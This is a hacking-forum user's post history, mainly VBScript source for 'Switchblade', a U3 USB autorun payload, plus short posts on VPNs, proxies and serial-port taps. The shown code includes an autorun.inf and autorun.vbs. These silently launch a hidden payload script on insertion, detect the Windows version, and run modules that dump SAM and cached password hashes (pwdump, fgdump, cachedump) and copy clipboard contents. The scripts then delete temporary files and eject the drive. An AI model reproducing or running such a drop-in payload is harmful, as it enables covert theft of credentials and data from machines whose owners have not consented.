False End If objRightFile.WriteLine "<tr><td>" & strLine & "</td></tr>" End Select Loop objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True End if 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" End if ' +-----------------------------------+ ' + Clipboard + ' +-----------------------------------+ If ReadINI("Clipboard","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_22"" target=""right"">Clipboard Contents</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_22""></a><font size=""3""><b>Clipboard Contents</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Contents</b></td></tr>" objRightFile.WriteLine "<tr><td><pre>" objShell.Run "nircmd.exe clipboard addfile " & strtmpFile, 0, True If objFSO.FileExists(strtmpFile) Then Set objTextFile = objFSO.OpenTextFile(strtmpFile, FOR_READING) Do Until objTextFile.AtEndOfStream objRightFile.WriteLine objTextFile.ReadLine Loop 'End Table objTextFile.Close Set objTextFile = Nothing objFSO.DeleteFile strtmpFile,True If Err <> 0 Then Err.Clear End If End if objRightFile.WriteLine "</pre></td></tr>" 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" 'WScript.Sleep 1000 End if ' +-----------------------------------+ ' + Win Audit + ' +-----------------------------------+ If ReadINI("Win Audit","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_23"" target=""right"">WinAudit</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_23""></a><font size=""3""><b>Parmavex WinAudit</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Status</b></td></tr>" cmdline = ReadINI("Win Audit","cmdline",strIniFile) objShell.Run "WinAudit.exe " & cmdline & _ " /f=" & strLogPath & "\" & "WinAudit-[" & strDate & "-" & strTime & "]" & _ " /l=" & strLogPath & "\WinAudit.log", 0, True objRightFile.WriteLine "<tr><td>"& "WinAudit.exe " & cmdline & _ " /f=" & strLogPath & "\" & "WinAudit-[" & strDate & "-" & strTime & "]" & _ " /l=" & strLogPath & "\WinAudit.log" & "</td></tr>" 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" End If ' +----------------------------------+ ' + [XP ACTIVATION] + ' +----------------------------------+ If ReadINI("WPA","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_24"" target=""right"">XP Activation</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_24""></a><font size=""3""><b>XP Activation</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Status</b></td></tr>" If objFSO.FileExists(objShell.ExpandEnvironmentStrings("%SystemRoot%") & "\system32\wpa.dbl") Then objFSO.CopyFile objShell.ExpandEnvironmentStrings("%SystemRoot%") & "\system32\wpa.dbl",strCurLog & "\" objRightFile.WriteLine "<tr><td>This file is an activation backup and will only function when installed on the original machine that has had no hardware" & _ " modifications. Boot the unit to safemode and copy the file to the System32 folder and restart.</td></tr>" Else objRightFile.WriteLine "<tr><td>File Not Found</td></tr>" End If 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" End If ' +-----------------------------------+ ' + Cleanup + ' +-----------------------------------+ objShell.CurrentDirectory = strLogPath objFSO.DeleteFile strtmpFile,True If ReadINI("SAM FGDUMP","KeepFile",strIniFile)= 0 AND ReadINI("SAM FGDUMP","Enable",strIniFile)= 1 Then objFSO.DeleteFile "127.0.0.1.pwdump",True End If If ReadINI("SAM PWDUMP","KeepFile",strIniFile)= 0 AND ReadINI("SAM PWDUMP","Enable",strIniFile)= 1 Then objFSO.DeleteFile "127.0.0.1.pwdump",True End If If ReadINI("Cache","KeepFile",strIniFile)= 0 AND ReadINI("Cache","Enable",strIniFile)= 1 Then objFSO.DeleteFile "127.0.0.1.cachedump",True End If objFSO.DeleteFile strFireFile,True objShell.CurrentDirectory =U3 ' +-----------------------------------+ ' + NirTone + ' +-----------------------------------+ If ReadINI("Nirtone","Enable",strIniFile) Then objLeftFile.WriteLine"<tr><td><b>* <a href=""" & "right-[" & strDate & "-" & strTime & "].html" & "#cat_99"" target=""right"">NirTones</a></b></td></tr>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine"<p><a name=""cat_99""></a><font size=""3""><b>NirCmd Beep</b></font></p>" objRightFile.WriteLine"<hr color=""#0066cc"" size=""2"" width=""400"">" objRightFile.WriteLine "<table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""3"" cellspacing=""0"" frame=""box"" rules=""all""><tbody><tr>" & _ "<td class=""colhead""><b>Status</b></td></tr>" objShell.Run "nircmd.exe beep " & ReadINI("Nirtone","Tone_1",strIniFile) , 0, True objShell.Run "nircmd.exe beep " & ReadINI("Nirtone","Tone_2",strIniFile) , 0, True objRightFile.WriteLine "<tr><td>Played</td></tr>" 'End Table objRightFile.WriteLine "</tbody></table></p><p> </p>" End If '::LEFT END HTML objLeftFile.WriteLine "</tbody></table></body></html>" objLeftFile.Close Set objLeftFile = Nothing 'right end HTML objRightFile.WriteLine "<hr color=""#ff9900"" size=""1""></center></body></html>" objRightFile.Close objTextFile.Close Set objTextFile = Nothing Set objRightFile = Nothing arrPath = Split(Wscript.ScriptFullName, "\") strdriveletter = arrPath(0) '' First we have to change the current directory so we aren't holding the drive open. objShell.CurrentDirectory = "C:\" 'objShell.Run U3 & "\RemoveDrive " & strdriveletter , 0, True objShell.Run U3 & "\deveject.exe -EjectDrive:" & strdriveletter & ":",0,True Set objShell = Nothing Set objFSO = Nothing WScript.Quit 'In case machine doesn't have new Scripting Engine 5.0 or later we use the version without regular expressions Function MyTrim(mystring) Dim start,Endpos start=1 for i=1 to Len(mystring) if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then start=i+1 else exit for end if next Endpos=Len(mystring) for i=Len(mystring) to 1 step -1 if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then Endpos=i-1 else exit for end if next if (endpos-start+1)<0 then MyTrim="" Exit Function end if MyTrim=Mid(mystring,start,Endpos-start+1) End Function Function ReadINI(section,key,filename) if objFSO.FileExists(filename) then Dim fReadINI, bsection bsection=False Set fReadINI = objFSO.OpenTextFile(filename,1) Do while not(fReadINI.AtEndOfStream) Dim strini,trimstrini strini = fReadINI.ReadLine trimstrini = MyTrim(strini) if Left(trimstrini,1)="[" and Right(Trimstrini,1)="]" then if StrComp(Trimstrini,"[" & MyTrim(section) & "]",1)=0 Then bsection=True else bsection =False end if Else if bsection then Dim poskey poskey = InStr(Trimstrini,"=") if posKey>0 then if StrComp(MyTrim(Left(Trimstrini,poskey-1)),MyTrim(key),1)=0 Then ReadINI = MyTrim(Mid(Trimstrini,poskey+1)) Exit Function end If End if end if End if Loop End if ReadINI = "" End Function Function RemoveHTML( strText ) Dim nPos1 Dim nPos2 nPos1 = InStr(strText, "<") Do While nPos1 > 0 nPos2 = InStr(nPos1 + 1, strText, ">") If nPos2 > 0 Then strText = Left(strText, nPos1 - 1) & Mid(strText, nPos2 + 1) Else Exit Do End If nPos1 = InStr(strText, "<") Loop RemoveHTML = strText End Function Function WMIDateStringToDate(utcDate) WMIDateStringToDate = CDate(Mid(utcDate, 5, 2) & "/" & _ Mid(utcDate, 7, 2) & "/" & _ Left(utcDate, 4) & " " & _ Mid (utcDate, 9, 2) & ":" & _ Mid(utcDate, 11, 2) & ":" & _ Mid(utcDate, 13, 2)) End Function

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

beakmyn replied to beakmyn's topic in USB Hacks

<cd>\autorun.inf [AutoRun] open=wscript autorun.vbs icon=LaunchU3.exe,0 [Definitions] Launchpad=LaunchPad.exe Vtype=2 [CopyFiles] FileNumber=1 File1=LaunchPad.zip [Update] URL=

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

beakmyn replied to beakmyn's topic in USB Hacks

In case the rapishares go un-used here's the .vbs source files <CD>\autorun.vbs Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Set colDrives = objFSO.Drives On Error Resume Next Dim aryVersion strComputerName = objShell.ExpandEnvironmentStrings("%computername%") 'strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2) 'strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2) For Each objDrive in colDrives 'ignore floppy drives - reserved by BIOS if they don't exist If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\payload.ini") Then strfd = objDrive.Driveletter & ":" End If If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\payload.vbs") Then strU3 = objDrive.Driveletter & ":" End If End if Next strIniFile = strfd & "\System\SRC\payload.ini" If ReadINI("U3","Enable",strIniFile) Then objShell.Run ".\LaunchU3.exe -a", 0, False End If If objFSO.FileExists("c:\safety.txt")=False Then Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputerName & "\root\cimv2") Set colOSes = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") For Each objOS in colOSes aryVersion= Split(objOS.Version,".") 'Version & build Next Select Case True Case aryVersion(0) = 4 And aryVersion(1) = 10 OSVer = "WIN98" Case aryVersion(0) = 4 And aryVersion(1) = 90 OSVer = "WINME" Case aryVersion(0) = 5 And aryVersion(1) = 0 OSVer = "WIN2K" Case aryVersion(0) = 5 And aryVersion(1) = 1 OSVer = "XP" Case aryVersion(0) = 5 And aryVersion(1) = 2 OSVer = "WIN2003" Case aryVersion(0) = 6 And aryVersion(1) = 0 OSVer = "VISTA" Case Else OSVer = "UNKNOWN" End Select If ReadINI("Payload",OSVer,strIniFile) Then objShell.Run "wscript " & strU3 & "\System\SRC\payload.vbs " & strfd & " " & strU3 & " " & OSVer, 0, False End If End if Wscript.Quit 'In case machine doesn't have new Scripting Engine 5.0 or later we use the version without regular expressions Function MyTrim(mystring) Dim start,Endpos start=1 for i=1 to Len(mystring) if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then start=i+1 else exit for end if next Endpos=Len(mystring) for i=Len(mystring) to 1 step -1 if Mid(mystring,i,1)=vbTab or Mid(mystring,i,1)=" " Then Endpos=i-1 else exit for end if next if (endpos-start+1)<0 then MyTrim="" Exit Function end if MyTrim=Mid(mystring,start,Endpos-start+1) End Function Function ReadINI(section,key,filename) if objFSO.FileExists(filename) then Dim fReadINI, bsection bsection=False Set fReadINI = objFSO.OpenTextFile(filename,1) Do while not(fReadINI.AtEndOfStream) Dim strini,trimstrini strini = fReadINI.ReadLine trimstrini = MyTrim(strini) if Left(trimstrini,1)="[" and Right(Trimstrini,1)="]" then if StrComp(Trimstrini,"[" & MyTrim(section) & "]",1)=0 Then bsection=True else bsection =False end if Else if bsection then Dim poskey poskey = InStr(Trimstrini,"=") if posKey>0 then if StrComp(MyTrim(Left(Trimstrini,poskey-1)),MyTrim(key),1)=0 Then ReadINI = MyTrim(Mid(Trimstrini,poskey+1)) Exit Function end If End if end if End if Loop End if ReadINI = "" End Function

VPNs

beakmyn replied to Conor_M's topic in Questions

OpenVPN is my choice. Set it up on an old Dell C600. Now I can monitor the home network and redirect all my http traffic through my home network. I had a little hiccup getting it running at first but my configs are here http://ubuntuforums.org/showthread.php?t=882298 The only issue I have is my ISP throttles my upload so the connection is fine for web surfing but streaming video or VNC sessions are a bit slow.

Upside down internet

beakmyn posted a topic in WiFi Pineapples Mark I, II, III

Upside down internet probably won't happen on the FON. I had a tough time working it out on my Linksys even with the SD card. giftrans and jpgflip will cross-compile after that it's a matter of setting up a transparent proxy (I tried a few different ones with limited success) and some iptable rules. It's probably easier to have the FON redirect traffic through a laptop which serves as the proxy and horsepower/storage for the image flipping.

Hijacking the COM Port

beakmyn replied to tempnode's topic in Security

The "vampire tap" was a device that you plugged inline with the serial port and allowed another device to monitor the data on the port and still allow normal data flow to the intended device. This one had the most bells & whistles of the one I used last (3 years ago). http://cgi.ebay.com/RS-232-RS-449-HP-4951-...1QQcmdZViewItem Damn I wish I had one now! They come in real handy for troubleshoot archaic systems that no one remembers how they work. To use it you have a DB9 or DB25 connector the looks like a straight though with another connector sticking out the top, the "vampire tap". What you hook up to it is your choice.

Hijacking the COM Port

beakmyn replied to tempnode's topic in Security

Which is why programs like HHD's serial monitor create a psuedo driver that you load before the other program and it shares the COM port to that program but still allows you to monitor it. You could also share the port by using CuriousTech's Xport. This will create a virtual serial port for the real one. Either way these must be run BEFORE the program that is to use the port since as you've found, they lock the port for exclusive access. Of course the other way is to put you're own serial device in-between by use of a vampire tap. Physical access trumps software. Or method 3 is to use HHD to port mirror and take what's gozinta/outa com1 and pass it on through to Com2.

Sign In

beakmyn

Posts

Joined

Last visited

Content Type

Profiles

Forums

Everything posted by beakmyn

Fon Promo Code

Fon Promo Code

Mag-stripe readers

=GonZor=- Payload V2.0

Mag-stripe readers

What's your source for illuminated switches?

Shannon is hot!

Shmoocon Secure Connection

Anybody used TrueCrypt?

U3 Incident Response Payload

U3 Incident Response Payload

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

Notes for Jasager on Fon+ 2201

Notes for Jasager on Fon+ 2201

Notes for Jasager on Fon+ 2201

binding the windows key in lunux

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output

VPNs

Upside down internet

Hijacking the COM Port

Hijacking the COM Port

Browse

Activity